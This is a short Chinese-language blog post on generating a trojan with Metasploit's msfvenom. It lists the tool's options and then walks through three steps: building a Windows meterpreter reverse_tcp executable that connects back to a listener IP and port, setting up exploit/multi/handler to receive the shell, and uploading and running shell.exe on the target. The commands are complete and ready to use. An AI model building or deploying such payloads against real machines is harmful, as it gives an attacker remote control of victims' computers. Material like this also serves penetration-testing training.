您当前的位置: 首页 > 

星球守护者

暂无认证

  • 6浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Metasploit 之生成木马(msfvenom)

星球守护者 发布时间:2021-08-21 21:59:40 ,浏览量:6

文章目录
      • msfvenom参数
      • windows

msfvenom参数

相关参数介绍

-p, --payload  指定需要使用的payload(攻击荷载)
-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled  为payload预先指定一个NOP滑动长度
-f, --format  指定输出格式 (使用 --list formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch  指定payload的目标架构
--platform  指定payload的目标平台
-s, --space  设定有效攻击荷载的最大长度
-b, --bad-chars  设定规避字符集,比如: '\x00\xff'
-i, --iterations  指定payload的编码次数
-c, --add-code  指定一个附加的win32 shellcode文件
-x, --template  指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--payload-options 列举payload的标准选项
-o, --out  保存payload
-v, --var-name  指定一个自定义的变量,以确定输出格式
--shellest 最小化生成payload
-h, --help 查看帮助选项
--help-formats 查看msf支持的输出格式列表
windows

第一步 生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.129 LPORT=9999 -f exe > shell.exe

在这里插入图片描述

第二步 msf进行监听

msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.129
set lport 9999
run 


在这里插入图片描述

第三步 上传到window,运行shell.exe

在这里插入图片描述

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0473s